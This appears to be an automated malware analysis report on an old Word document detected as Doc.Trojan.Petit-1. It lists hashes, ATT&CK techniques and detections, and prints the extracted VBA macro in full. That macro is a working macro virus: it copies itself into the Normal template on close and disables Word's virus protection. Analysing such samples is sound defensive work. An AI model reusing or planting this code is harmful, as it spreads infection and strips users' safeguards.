Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10b109056d99439c…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 2002-10-07 17:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 77d9602b32360d85e27d99f46ecb5371
SHA-1: 5d340b2473c9bad1a771f8a0ff13088f031b1254
SHA-256: 10b109056d99439cfeb5315cff9e0098827c222e37f6d4629abe7ce51f25a58f
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Petit-1'. It contains VBA macros that are obfuscated but appear to be designed to execute malicious code when the document is closed. The macro code attempts to modify the document's code modules and disable virus protection, suggesting it's a downloader or dropper for further malicious activity.

Heuristics 2

  • ClamAV: Doc.Trojan.Petit-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Petit-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 638 bytes
SHA-256: 898087acb61d2065c0238e69145547da99dd56855b9b218cbd9365563fa52a6e
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
c = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 13)
With Documents(1).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString c
End With
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString c
End With
Options.VirusProtection = 0
End Sub
'wm97.Petite by vlam